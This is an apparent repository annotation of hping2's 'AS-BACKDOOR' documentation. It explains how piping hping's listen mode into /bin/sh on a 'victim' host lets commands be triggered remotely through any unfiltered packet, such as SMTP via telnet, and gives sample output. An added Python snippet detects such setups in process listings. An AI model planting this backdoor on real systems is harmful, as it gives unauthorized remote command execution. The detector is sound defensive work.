Annotation of embedaddon/hping2/docs/AS-BACKDOOR, revision 1.1.1.1
hping can be used as a backdoor. Just try the -9 (--listen) option
and put it in a pipe with /bin/sh:

Put hping in listen mode on the victim host.

victim# hping -I eth0 -9 mysign | /bin/sh

Every packet that contains "mysign" will be processed by hping, and
all the bytes that follow "mysign" in the packet will be dumped to
standard output, so for example I'll be able to exec commands using
all types of protocols. Just as an example, I can use the smtpd to
exec 'ls' on the victim.

evil$ telnet victim 25

Trying 192.168.1.1...
Connected to nano (192.168.1.1).
Escape character is '^]'.
220 nano.marmoc.net ESMTP Sendmail
mysignls;

On the victim you will see:

victim# hping -I eth0 -9 mysign | /bin/sh
hping2 listen mode
bin cdrom etc home local-home mnt root tmp var
boot dev export lib lost+found proc sbin usr
: command not found

As you can see I used 'ls;', since otherwise the shell would receive
just ls^M. The ";" forces the command execution (at least with bash and zsh;
check your shell for more information).

This works with all kinds of valid, unfiltered IP packets; the higher
level protocol does not matter.
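From the defender's side, the telltale of this setup on the host is an hping process started with -9/--listen whose pipeline partner is a shell. The following host check is an added example, not part of the hping documentation or project code; it assumes `ps -eo pid,ppid,args` style input and runs on a constructed sample rather than a live process table.

```python
import shlex
from collections import defaultdict

# Constructed sample of `ps -eo pid,ppid,args` output (not real data). The
# pipeline `hping ... -9 mysign | /bin/sh` gives hping and the shell the
# same parent PID, which is what the check below keys on.
SAMPLE_PS = """\
  PID  PPID ARGS
    1     0 /sbin/init
  412     1 /usr/sbin/sendmail -bd -q30m
  980   900 -bash
 1022   980 hping -I eth0 -9 mysign
 1023   980 /bin/sh
 1100   900 hping -S -p 80 10.0.0.5
"""

LISTEN_FLAGS = {"-9", "--listen"}          # hping listen-mode options
SHELLS = {"sh", "bash", "zsh", "dash", "ksh"}

def parse_ps(text):
    """Parse (pid, ppid, args) rows, skipping the header line."""
    procs = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) == 3:
            procs.append({"pid": int(parts[0]), "ppid": int(parts[1]), "args": parts[2]})
    return procs

def _basename(argv0):
    # "-bash" is a login shell; strip the leading dash and any path.
    return argv0.lstrip("-").rsplit("/", 1)[-1]

def is_hping_listen(args):
    """True if the command line is hping/hping2 in listen mode."""
    argv = shlex.split(args)
    if not argv or not _basename(argv[0]).startswith("hping"):
        return False
    return any(a in LISTEN_FLAGS for a in argv[1:])

def find_listen_backdoors(ps_text):
    """Return (hping_pid, shell_pid_or_None) for each listening hping.
    A sibling shell under the same parent is the `| /bin/sh` partner."""
    procs = parse_ps(ps_text)
    by_parent = defaultdict(list)
    for p in procs:
        by_parent[p["ppid"]].append(p)
    hits = []
    for p in procs:
        if not is_hping_listen(p["args"]):
            continue
        shell = next((s["pid"] for s in by_parent[p["ppid"]]
                      if s["pid"] != p["pid"]
                      and _basename(shlex.split(s["args"])[0]) in SHELLS), None)
        hits.append((p["pid"], shell))
    return hits
```

A listening hping without a shell sibling is still worth a look, since the payload could be piped into any interpreter, not only /bin/sh.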

antirez <antirez@invece.org>